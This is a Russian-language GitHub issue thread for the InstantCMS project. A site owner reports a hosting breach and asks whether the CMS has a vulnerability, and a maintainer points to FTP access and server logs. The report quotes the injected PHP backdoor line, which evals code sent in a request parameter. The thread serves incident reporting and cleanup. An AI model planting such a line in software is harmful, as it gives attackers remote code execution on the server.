### ISSUE TITLE
Взлом хостинга

### ISSUE THREAD

**Issue by mk198** [instantsoft/icms2#68]
При взломе хостинга были внесены изменения в следующие файлы:
/templates/default/widgets/wrapper_plain.tpl.php
/templates/default/controllers/users/widgets/list/list.tpl.php
в начало файлов добавлено следующее:
<?php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>

Для чего это было сделано? Нет ли какой уязвимости?

**Comment by lokanaft** [comment]
Только в один фал?

**Comment by mk198** [comment]
Второй файл забыл указать, отредактировал сообщение. Я обнаружил только эти изменения.

**Comment by pin-git** [comment]
Тут вопрос в другом - Как смогли это сделать?

**Comment by pin-git** [comment]
какая установлена версия? шаблон сторонний, если нет, то изменялся ли default?

**Comment by fuzegit** [comment]
1. здесь не место подобным сообщениям, здесь указываются ошибки или пожелания.
2. раз внесли правку в файлы движка, значит получили доступ к ftp, а это уже не проблема CMS. Также вы могли пренебречь базовыми правилами безопасности и сделали все файлы доступными для записи. А еще вероятнее, что тот, кому вы давали доступ к своему сайту оставил вот такой вот бэкдор. Можно только гадать. Изучайте логи сервера и выясняйте каким образом вам это сделали. Проверьте хостинг на наличие шелов. 
Если изучение логов приведет к тому, что взлом был произведен именно из-за какой-то уязвимости CMS, присылайте логи, где это явно подтверждается мне на почту fuze@instantcms.ru.
